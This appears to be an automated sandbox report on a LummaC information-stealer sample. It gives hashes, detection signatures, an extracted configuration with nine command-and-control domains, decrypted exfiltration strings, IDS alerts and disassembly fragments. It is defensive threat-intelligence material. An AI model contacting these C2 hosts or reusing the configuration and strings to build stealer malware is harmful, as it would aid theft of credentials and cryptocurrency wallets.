Edit tour

Windows Analysis Report
L5Kgf2Tvkc.exe

Overview

General Information

Sample name:	L5Kgf2Tvkc.exe renamed because original name is a hash value
Original sample name:	607558ab24e139b427bdc194ae34157c.exe
Analysis ID:	1580301
MD5:	607558ab24e139b427bdc194ae34157c
SHA1:	1de3eb49b265414470e2dba81231436f3ef08fb6
SHA256:	fec5ed9fad03970d53ee85a1bca503497f08053a42c92955e60fabf0e320a71d
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

LummaC encrypted strings found

Machine Learning detection for sample

Performs DNS queries to domains with low reputation

Sample uses string decryption to hide its real strings

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

L5Kgf2Tvkc.exe (PID: 1436 cmdline: "C:\Users\user\Desktop\L5Kgf2Tvkc.exe" MD5: 607558AB24E139B427BDC194AE34157C)

WerFault.exe (PID: 5840 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 1656 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 6952 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 1740 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["wrathful-jammy.cyou", "sordid-snaked.cyou", "effecterectz.xyz", "spellshagey.biz", "diffuculttan.xyz", "immureprech.biz", "deafeninggeh.biz", "awake-weaves.cyou", "debonairnukk.xyz"], "Build id": "HpOoIh--2a727a032c4d"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2043604722.0000000000470000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T09:00:34.187134+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	23.55.153.106	443	TCP
2024-12-24T09:00:36.851198+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	172.67.157.254	443	TCP
2024-12-24T09:00:38.159835+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	172.67.157.254	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T09:00:37.714573+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	172.67.157.254	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T09:00:37.714573+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49731	172.67.157.254	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T09:00:32.023772+0100	2058210	1	Domain Observed Used for C2 Detected	192.168.2.4	53709	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T09:00:30.667819+0100	2058214	1	Domain Observed Used for C2 Detected	192.168.2.4	63025	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T09:00:31.380074+0100	2058216	1	Domain Observed Used for C2 Detected	192.168.2.4	61400	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T09:00:31.120258+0100	2058218	1	Domain Observed Used for C2 Detected	192.168.2.4	63497	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T09:00:30.892380+0100	2058220	1	Domain Observed Used for C2 Detected	192.168.2.4	63445	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T09:00:30.424242+0100	2058222	1	Domain Observed Used for C2 Detected	192.168.2.4	51225	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T09:00:32.332930+0100	2058226	1	Domain Observed Used for C2 Detected	192.168.2.4	50668	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spellshagey .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T09:00:30.188277+0100	2058285	1	Domain Observed Used for C2 Detected	192.168.2.4	54829	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T09:00:31.718284+0100	2058236	1	Domain Observed Used for C2 Detected	192.168.2.4	65061	1.1.1.1	53	UDP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-24T09:00:35.224872+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.4	49730	23.55.153.106	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: L5Kgf2Tvkc.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://lev-tolstoi.com/apiHft2	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apiDN	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/33	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apil1	Avira URL Cloud: Label: malware
Source: spellshagey.biz	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/S	Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/xe$N	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.3.L5Kgf2Tvkc.exe.2180000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["wrathful-jammy.cyou", "sordid-snaked.cyou", "effecterectz.xyz", "spellshagey.biz", "diffuculttan.xyz", "immureprech.biz", "deafeninggeh.biz", "awake-weaves.cyou", "debonairnukk.xyz"], "Build id": "HpOoIh--2a727a032c4d"}

Multi AV Scanner detection for submitted file

Source: L5Kgf2Tvkc.exe	Virustotal: Detection: 71%			Perma Link
Source: L5Kgf2Tvkc.exe	ReversingLabs: Detection: 73%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: L5Kgf2Tvkc.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp	String decryptor: sordid-snaked.cyou
Source: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp	String decryptor: awake-weaves.cyou
Source: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp	String decryptor: wrathful-jammy.cyou
Source: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp	String decryptor: debonairnukk.xyz
Source: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp	String decryptor: diffuculttan.xyz
Source: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp	String decryptor: effecterectz.xyz
Source: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp	String decryptor: deafeninggeh.biz
Source: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp	String decryptor: immureprech.biz
Source: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp	String decryptor: spellshagey.biz
Source: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp	String decryptor: HpOoIh--2a727a032c4d

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe

Unpacked PE file: 0.2.L5Kgf2Tvkc.exe.400000.0.unpack

Source: L5Kgf2Tvkc.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then jmp ecx	0_2_0043CA12
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+50h]	0_2_00437BC0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+2D1F4786h]	0_2_0043D010
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov ecx, eax	0_2_0042A0E0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_0041C08C
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov edi, edx	0_2_00409150
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_00409150
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_00409150
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov ebx, eax	0_2_00405950
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov ebp, eax	0_2_00405950
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	0_2_00414170
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebp+02h]	0_2_00429170
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 7A5C62DDh	0_2_00418176
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then lea edi, dword ptr [esi+esi]	0_2_0040D120
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx edi, word ptr [ecx]	0_2_0041912E
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx eax, byte ptr [esp+esi+5D0CB002h]	0_2_0041912E
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_004349C0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then jmp ecx	0_2_0043C9DB
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_004189F5
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_0042B980
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx-61DE2F8Fh]	0_2_0043D980
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx-61DE2F8Fh]	0_2_0043D980
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-47h]	0_2_0041D200
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov ebx, ecx	0_2_00423A1C
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+0984A1C9h]	0_2_00417A28
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then lea edx, dword ptr [ecx-5D3369E7h]	0_2_00409AC1
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+eax+0CC5C7CCh]	0_2_00409AC1
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0042C2CF
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 7A5C62DDh	0_2_00418176
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx-61DE2F8Fh]	0_2_0043DA80
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx-61DE2F8Fh]	0_2_0043DA80
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then jmp ecx	0_2_0043CA9D
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov ecx, ebx	0_2_0043CB51
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_0043EB50
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0041BB5A
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+00000098h]	0_2_0042DB7F
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx-61DE2F8Fh]	0_2_0043DBF0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx-61DE2F8Fh]	0_2_0043DBF0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_004223A0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then cmp dword ptr [edi+ecx*8], A269EEEFh	0_2_004383A0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edx]	0_2_0040A3AA
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movsx esi, byte ptr [ebp+ecx+00h]	0_2_0043D450
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+00000098h]	0_2_0042DB7A
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	0_2_0042B4D0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	0_2_004144D5
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx-61DE2F8Fh]	0_2_0043DC80
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx-61DE2F8Fh]	0_2_0043DC80
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov ecx, edi	0_2_004074A0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx-1700BF35h]	0_2_0041C4A1
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	0_2_004144A5
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then jmp dword ptr [004446A8h]	0_2_00416D51
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx-61DE2F8Fh]	0_2_0043DD00
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx edx, byte ptr [eax+ecx-61DE2F8Fh]	0_2_0043DD00
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+20h]	0_2_0042A5CF
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+38h]	0_2_0041C661
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-0CD1ACF4h]	0_2_00438630
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_00438630
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov word ptr [ecx], bp	0_2_0041D6C2
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov word ptr [ecx], bp	0_2_0041D6D9
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_00408EF0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov ecx, eax	0_2_00422F0D
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then jmp dword ptr [00444700h]	0_2_00416F11
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0042AF10
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx eax, word ptr [ebx+ecx]	0_2_004227B0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2B30990Bh]	0_2_004227B0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+esi+02h]	0_2_004227B0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	0_2_004227B0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+20h]	0_2_0064A836
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+38h]	0_2_0063C8C8
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-0CD1ACF4h]	0_2_00658897
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov eax, dword ptr [esp]	0_2_00658897
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0064B177
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then jmp dword ptr [00444700h]	0_2_00637178
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov word ptr [ecx], bp	0_2_0063D94F
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_00629157
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov ecx, eax	0_2_0064318B
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov ebx, ecx	0_2_00643A76
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx eax, word ptr [ebx+ecx]	0_2_00642A17
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2B30990Bh]	0_2_00642A17
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+esi+02h]	0_2_00642A17
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	0_2_00642A17
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_0063C2F3
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov ecx, eax	0_2_0064A347
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_0064BBE7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	0_2_00634BCD
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebp+02h]	0_2_006493D7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 7A5C62DDh	0_2_006383DD
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov ebx, eax	0_2_00625BB7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov ebp, eax	0_2_00625BB7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov edi, edx	0_2_006293B7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_006293B7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_006293B7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then lea edi, dword ptr [esi+esi]	0_2_0062D387
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov eax, dword ptr [esp+0000008Ch]	0_2_00636B91
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx edi, word ptr [ecx]	0_2_00639395
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx eax, byte ptr [esp+esi+5D0CB002h]	0_2_00639395
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-47h]	0_2_0063D467
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00638C5C
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00654C27
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+0984A1C9h]	0_2_00637C83
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then lea edx, dword ptr [ecx-5D3369E7h]	0_2_00629D28
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+eax+0CC5C7CCh]	0_2_00629D28
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0064C536
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+00000098h]	0_2_0064DDE6
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0063BDC1
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_0065EDB7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+50h]	0_2_00657E27
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00642607
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edx]	0_2_0062A611
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+00000098h]	0_2_0064DDE1
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	0_2_0064B737
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then mov ecx, edi	0_2_00627707
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx-1700BF35h]	0_2_0063C708
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 4x nop then jmp dword ptr [004446A8h]	0_2_00636FB8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.4:51225 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.4:53709 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.4:65061 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.4:61400 -> 1.1.1.1:53
